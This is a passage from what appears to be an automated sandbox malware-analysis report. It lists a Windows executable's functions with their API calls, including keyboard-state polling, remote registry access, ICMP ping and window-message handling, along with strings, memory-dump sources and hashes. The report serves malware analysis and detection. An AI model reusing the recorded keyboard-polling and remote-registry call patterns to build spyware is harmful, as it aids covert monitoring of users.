                          • Associated: 00000000.00000002.2919870370.0000000000C7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920360041.0000000000C83000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920432807.0000000000C84000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID: ColorLongWindow
                          • String ID:
                          • API String ID: 259745315-0
                          • Opcode ID: aefc857612f998c764f74b45f1d3f33f2fc10e28570483ba6011e2f12f65043a
                          • Instruction ID: c5e1ca98d63b01d3ff9b1232397f666ad3e372751d174a56f3ed13d4455fca1e
                          • Opcode Fuzzy Hash: aefc857612f998c764f74b45f1d3f33f2fc10e28570483ba6011e2f12f65043a
                          • Instruction Fuzzy Hash: DE417031100540ABDB206F28D888FEA37A6EF0A720F5442A6FD759B1E1DB318C81DB22
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 00B47334 Relevance: 18.1, APIs: 12, Instructions: 113COMMON
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                          • Associated: 00000000.00000002.2919797498.0000000000B00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BF5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000C7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920360041.0000000000C83000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920432807.0000000000C84000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID: _wcscat_wcscpy$__wsplitpath$_wcschr
                          • String ID:
                          • API String ID: 136442275-0
                          • Opcode ID: b5f59ad072f647481b0a03130791023c9342fe3f16594726c1a48e8a2685249c
                          • Instruction ID: b6a98e76ef5fe282a45a0f47a5d3e82be41b6c2a0269f2017c5e6a99e7236786
                          • Opcode Fuzzy Hash: b5f59ad072f647481b0a03130791023c9342fe3f16594726c1a48e8a2685249c
                          • Instruction Fuzzy Hash: 1C411AB280412CAACB21EB54DC41EEE73FCEB18310F0045E6B509A2051EF34ABD5CFA4
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 00B084A6 Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 145COMMON
                          Download Yara Rule
                          APIs
                          • __swprintf.LIBCMT ref: 00B084E5
                          • __itow.LIBCMT ref: 00B08519
                            • Part of subcall function 00B22177: _xtow@16.LIBCMT ref: 00B22198
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                          • Associated: 00000000.00000002.2919797498.0000000000B00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BF5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000C7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920360041.0000000000C83000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920432807.0000000000C84000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID: __itow__swprintf_xtow@16
                          • String ID: %.15g$0x%p$False$True
                          • API String ID: 1502193981-2263619337
                          • Opcode ID: 22419ea5e093807d302094b021ee67e7a6c6017b62af48f3e7c56f6e90f495a6
                          • Instruction ID: 56684a3a3a867afd419dccfd51e495a24e3a7d586b2e4fbcd9707c0c71adc98b
                          • Opcode Fuzzy Hash: 22419ea5e093807d302094b021ee67e7a6c6017b62af48f3e7c56f6e90f495a6
                          • Instruction Fuzzy Hash: 6841C571A00615ABDB34DB38D882E6A7BE5FF54310F2084DAE59ED62D2EA719B41CB10
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 00B3AEE5 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 127registryshareCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 00B07E53: _memmove.LIBCMT ref: 00B07EB9
                          • _memset.LIBCMT ref: 00B3AF74
                          • WNetAddConnection2W.MPR(?,?,?,00000000), ref: 00B3AFA9
                          • RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 00B3AFC5
                          • RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,SOFTWARE\Classes\), ref: 00B3AFE1
                          • RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?,?,SOFTWARE\Classes\), ref: 00B3B00B
                          • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 00B3B03E
                          • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 00B3B043
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                          • Associated: 00000000.00000002.2919797498.0000000000B00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BF5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000C7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920360041.0000000000C83000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920432807.0000000000C84000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID: Close$ConnectConnection2OpenQueryRegistryValue_memmove_memset
                          • String ID: SOFTWARE\Classes\$\CLSID$\IPC$
                          • API String ID: 4211336532-22481851
                          • Opcode ID: 9ce3ee5021eead5327db89da76394399507bf8659af17bd6ca4149f0ed1a6a96
                          • Instruction ID: 4dea5103586854ac5e1619360316bbeec339ac915eb9d88e7dcb0a9d167fe4f1
                          • Opcode Fuzzy Hash: 9ce3ee5021eead5327db89da76394399507bf8659af17bd6ca4149f0ed1a6a96
                          • Instruction Fuzzy Hash: 23412A76C10229ABDF15EBA4DC95DEEBBB8FF14700F1045A9E906A31A0DB709E05CF51
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 00B25C91 Relevance: 16.8, APIs: 11, Instructions: 257COMMON
                          Download Yara Rule
                          APIs
                          • _memset.LIBCMT ref: 00B25CCA
                            • Part of subcall function 00B2889E: __getptd_noexit.LIBCMT ref: 00B2889E
                          • __gmtime64_s.LIBCMT ref: 00B25D63
                          • __gmtime64_s.LIBCMT ref: 00B25D99
                          • __gmtime64_s.LIBCMT ref: 00B25DB6
                          • __allrem.LIBCMT ref: 00B25E0C
                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00B25E28
                          • __allrem.LIBCMT ref: 00B25E3F
                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00B25E5D
                          • __allrem.LIBCMT ref: 00B25E74
                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00B25E92
                          • __invoke_watson.LIBCMT ref: 00B25F03
                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                          • Associated: 00000000.00000002.2919797498.0000000000B00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BF5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000C7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920360041.0000000000C83000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920432807.0000000000C84000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@__gmtime64_s$__getptd_noexit__invoke_watson_memset
                          • String ID:
                          • API String ID: 384356119-0
                          • Opcode ID: 44019df33dda40162e7ad5693cac5fdd13db5b94ac58de4e6029986730a9c23d
                          • Instruction ID: be7410cef2f615886fda50f67255abd9fb024104ce8c1a9f90b2fdab98f1efe7
                          • Opcode Fuzzy Hash: 44019df33dda40162e7ad5693cac5fdd13db5b94ac58de4e6029986730a9c23d
                          • Instruction Fuzzy Hash: B971EB71A01B26ABD724AF78DC82BAA73E4FF14764F1441B9F518D7681E770DE408790
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 00B457FB Relevance: 16.7, APIs: 11, Instructions: 189windowsleepCOMMON
                          Download Yara Rule
                          APIs
                          • _memset.LIBCMT ref: 00B45816
                          • GetMenuItemInfoW.USER32(00BC18F0,000000FF,00000000,00000030), ref: 00B45877
                          • SetMenuItemInfoW.USER32(00BC18F0,00000004,00000000,00000030), ref: 00B458AD
                          • Sleep.KERNEL32(000001F4), ref: 00B458BF
                          • GetMenuItemCount.USER32(?), ref: 00B45903
                          • GetMenuItemID.USER32(?,00000000), ref: 00B4591F
                          • GetMenuItemID.USER32(?,-00000001), ref: 00B45949
                          • GetMenuItemID.USER32(?,?), ref: 00B4598E
                          • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00B459D4
                          • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00B459E8
                          • SetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00B45A09
                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                          • Associated: 00000000.00000002.2919797498.0000000000B00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BF5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000C7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920360041.0000000000C83000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920432807.0000000000C84000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID: ItemMenu$Info$CheckCountRadioSleep_memset
                          • String ID:
                          • API String ID: 4176008265-0
                          • Opcode ID: a94dcb247ed73f970a621784780bb4601cac39832e09630d3a64da55434409d7
                          • Instruction ID: 9670c64ece146db8c1292907f72b013233a7a9c5035a29b10dcd26d112d45138
                          • Opcode Fuzzy Hash: a94dcb247ed73f970a621784780bb4601cac39832e09630d3a64da55434409d7
                          • Instruction Fuzzy Hash: 0E61B370900A49EFDF21DFA4D888EBE7BF8EB05314F14059AF441A7252DB309E05EB21
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 00B69A23 Relevance: 16.7, APIs: 11, Instructions: 183windowCOMMON
                          Download Yara Rule
                          APIs
                          • SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 00B69AA5
                          • SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 00B69AA8
                          • GetWindowLongW.USER32(?,000000F0), ref: 00B69ACC
                          • _memset.LIBCMT ref: 00B69ADD
                          • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00B69AEF
                          • SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 00B69B67
                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                          • Associated: 00000000.00000002.2919797498.0000000000B00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BF5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000C7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920360041.0000000000C83000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920432807.0000000000C84000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID: MessageSend$LongWindow_memset
                          • String ID:
                          • API String ID: 830647256-0
                          • Opcode ID: 0137ffc06365ba16a5d947a976b2d5f9c907b471876082de9e07ff8a3345b66b
                          • Instruction ID: 13b70122a3e3e45f29c9e42f45062971fdee40dd2bca75d6b900f55a458982d4
                          • Opcode Fuzzy Hash: 0137ffc06365ba16a5d947a976b2d5f9c907b471876082de9e07ff8a3345b66b
                          • Instruction Fuzzy Hash: DF615975A00208AFEB11DFA8CC81EEE77F8EB09700F140599FA15E72A2D774A945DB60
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 00B43569 Relevance: 16.6, APIs: 11, Instructions: 119keyboardCOMMON
                          Download Yara Rule
                          APIs
                          • GetKeyboardState.USER32(?), ref: 00B43591
                          • GetAsyncKeyState.USER32(000000A0), ref: 00B43612
                          • GetKeyState.USER32(000000A0), ref: 00B4362D
                          • GetAsyncKeyState.USER32(000000A1), ref: 00B43647
                          • GetKeyState.USER32(000000A1), ref: 00B4365C
                          • GetAsyncKeyState.USER32(00000011), ref: 00B43674
                          • GetKeyState.USER32(00000011), ref: 00B43686
                          • GetAsyncKeyState.USER32(00000012), ref: 00B4369E
                          • GetKeyState.USER32(00000012), ref: 00B436B0
                          • GetAsyncKeyState.USER32(0000005B), ref: 00B436C8
                          • GetKeyState.USER32(0000005B), ref: 00B436DA
                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                          • Associated: 00000000.00000002.2919797498.0000000000B00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BF5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000C7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920360041.0000000000C83000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920432807.0000000000C84000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID: State$Async$Keyboard
                          • String ID:
                          • API String ID: 541375521-0
                          • Opcode ID: 8d3ad508a26e425ff3f45dc7a4d079b2e172d16f2b57683d6e3927f2bdf35e0c
                          • Instruction ID: 808062d445c5803ebadff8ddcf3796691aaf9e240ccdc42f08acb482f1698c6c
                          • Opcode Fuzzy Hash: 8d3ad508a26e425ff3f45dc7a4d079b2e172d16f2b57683d6e3927f2bdf35e0c
                          • Instruction Fuzzy Hash: 0B4195705087CA7DFF719B6484153A5BAE0EB21B44F0C80DAD5C6472C2DBB59BC8DB62
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 00B3A28D Relevance: 16.6, APIs: 11, Instructions: 109memoryCOMMON
                          Download Yara Rule
                          APIs
                          • SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,00000000,?), ref: 00B3A2AA
                          • SafeArrayAllocData.OLEAUT32(?), ref: 00B3A2F5
                          • VariantInit.OLEAUT32(?), ref: 00B3A307
                          • SafeArrayAccessData.OLEAUT32(?,?), ref: 00B3A327
                          • VariantCopy.OLEAUT32(?,?), ref: 00B3A36A
                          • SafeArrayUnaccessData.OLEAUT32(?), ref: 00B3A37E
                          • VariantClear.OLEAUT32(?), ref: 00B3A393
                          • SafeArrayDestroyData.OLEAUT32(?), ref: 00B3A3A0
                          • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00B3A3A9
                          • VariantClear.OLEAUT32(?), ref: 00B3A3BB
                          • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00B3A3C6
                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                          • Associated: 00000000.00000002.2919797498.0000000000B00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BF5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000C7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920360041.0000000000C83000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920432807.0000000000C84000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
                          • String ID:
                          • API String ID: 2706829360-0
                          • Opcode ID: fa5d6cace2fc4bec07fbc0dff933e1c8fc67b23c8dfd28fdfcdd02115d7572e4
                          • Instruction ID: ecd1a32014f2627ac42e19d94b5afb61ac9292e355ad79a9fff0a4aba5859f73
                          • Opcode Fuzzy Hash: fa5d6cace2fc4bec07fbc0dff933e1c8fc67b23c8dfd28fdfcdd02115d7572e4
                          • Instruction Fuzzy Hash: F5412135900219AFCB01DFA4DC889DEBFB9FF44354F2480A5F551A72A1DB31AA45CBA1
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 00B58694 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 163networkfileCOMMON
                          Download Yara Rule
                          APIs
                          • WSAStartup.WS2_32(00000101,?), ref: 00B586F5
                          • inet_addr.WS2_32(?), ref: 00B5873A
                          • gethostbyname.WS2_32(?), ref: 00B58746
                          • IcmpCreateFile.IPHLPAPI ref: 00B58754
                          • IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 00B587C4
                          • IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 00B587DA
                          • IcmpCloseHandle.IPHLPAPI(00000000), ref: 00B5884F
                          • WSACleanup.WS2_32 ref: 00B58855
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                          • Associated: 00000000.00000002.2919797498.0000000000B00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BF5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000C7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920360041.0000000000C83000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920432807.0000000000C84000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
                          • String ID: Ping
                          • API String ID: 1028309954-2246546115
                          • Opcode ID: 323529b357c46ccc501986dfffa9923a9f7c9f1e225eb94fd2f86e26d44d41e5
                          • Instruction ID: 2b0cffe18608d22b22bd081c62c714b3b9aaf8b6c50c41198fc446b16403f9cc
                          • Opcode Fuzzy Hash: 323529b357c46ccc501986dfffa9923a9f7c9f1e225eb94fd2f86e26d44d41e5
                          • Instruction Fuzzy Hash: D75180316042019FD711AF20CC85B6ABBE4EF48721F1449EAF956AB2E1DF70ED05CB52
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 00B69C50 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 105windowCOMMON
                          Download Yara Rule
                          APIs
                          • _memset.LIBCMT ref: 00B69C68
                          • CreateMenu.USER32 ref: 00B69C83
                          • SetMenu.USER32(?,00000000), ref: 00B69C92
                          • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00B69D1F
                          • IsMenu.USER32(?), ref: 00B69D35
                          • CreatePopupMenu.USER32 ref: 00B69D3F
                          • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 00B69D70
                          • DrawMenuBar.USER32 ref: 00B69D7E
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                          • Associated: 00000000.00000002.2919797498.0000000000B00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BF5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000C7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920360041.0000000000C83000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920432807.0000000000C84000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID: Menu$CreateItem$DrawInfoInsertPopup_memset
                          • String ID: 0
                          • API String ID: 176399719-4108050209
                          • Opcode ID: 4bfd6ac9989d0fe6da566135766c11d0e8fe3ab786609fbc5413cbad0131c0bc
                          • Instruction ID: 117a52c8eca69ebd19450637131af64322eb0cb37a6f4ce8d3fa490407eb1b9c
                          • Opcode Fuzzy Hash: 4bfd6ac9989d0fe6da566135766c11d0e8fe3ab786609fbc5413cbad0131c0bc
                          • Instruction Fuzzy Hash: E3412575A00209EFDB10EF68D984BEA7BF9FF49314F140469E945A73A1DB34A910DF60
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 00B4EC11 Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 97COMMON
                          Download Yara Rule
                          APIs
                          • SetErrorMode.KERNEL32(00000001), ref: 00B4EC1E
                          • GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000002,00000001), ref: 00B4EC94
                          • GetLastError.KERNEL32 ref: 00B4EC9E
                          • SetErrorMode.KERNEL32(00000000,READY), ref: 00B4ED0B
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                          • Associated: 00000000.00000002.2919797498.0000000000B00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BF5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000C7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920360041.0000000000C83000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920432807.0000000000C84000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID: Error$Mode$DiskFreeLastSpace
                          • String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
                          • API String ID: 4194297153-14809454
                          • Opcode ID: 56173c2d257e844bfc248099d762edaf70f6fbcbf0d97eb3184692be825fe9e6
                          • Instruction ID: 3a231f8e91cfed0d3fc23ccb12c5dcb331ddc4f74c53fe5278666f2d2c2fad68
                          • Opcode Fuzzy Hash: 56173c2d257e844bfc248099d762edaf70f6fbcbf0d97eb3184692be825fe9e6
                          • Instruction Fuzzy Hash: 4F316F35A00209AFD710EB64C989EAEBBF4FF44710F1440A6E512E72E2DB71DE41DB91
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 00B3C6FD Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 81windowCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 00B0CAEE: _memmove.LIBCMT ref: 00B0CB2F
                          • SendMessageW.USER32(?,0000018C,000000FF,00000002), ref: 00B3C782
                          • GetDlgCtrlID.USER32 ref: 00B3C78D
                          • GetParent.USER32 ref: 00B3C7A9
                          • SendMessageW.USER32(00000000,?,00000111,?), ref: 00B3C7AC
                          • GetDlgCtrlID.USER32(?), ref: 00B3C7B5
                          • GetParent.USER32(?), ref: 00B3C7D1
                          • SendMessageW.USER32(00000000,?,?,00000111), ref: 00B3C7D4
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                          • Associated: 00000000.00000002.2919797498.0000000000B00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BF5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000C7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920360041.0000000000C83000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920432807.0000000000C84000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID: MessageSend$CtrlParent$_memmove
                          • String ID: ComboBox$ListBox
                          • API String ID: 313823418-1403004172
                          • Opcode ID: ce1c866a1751a90d862ea6a1b3ab1ef38f93bc1ace0c47b7ff8ce3ef12f3ee0e
                          • Instruction ID: c69f8e7e309d7c119f405c2ff682a5f822c6ce3965de187197aba3f8aaf3c8f0
                          • Opcode Fuzzy Hash: ce1c866a1751a90d862ea6a1b3ab1ef38f93bc1ace0c47b7ff8ce3ef12f3ee0e
                          • Instruction Fuzzy Hash: BE217474A00208AFDB05EBA4CC95DFE7BA5EF46310F204196F962E71E1DF745815DB60
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 00B3C7E6 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 80windowCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 00B0CAEE: _memmove.LIBCMT ref: 00B0CB2F
                          • SendMessageW.USER32(?,00000186,00000002,00000000), ref: 00B3C869
                          • GetDlgCtrlID.USER32 ref: 00B3C874
                          • GetParent.USER32 ref: 00B3C890
                          • SendMessageW.USER32(00000000,?,00000111,?), ref: 00B3C893
                          • GetDlgCtrlID.USER32(?), ref: 00B3C89C
                          • GetParent.USER32(?), ref: 00B3C8B8
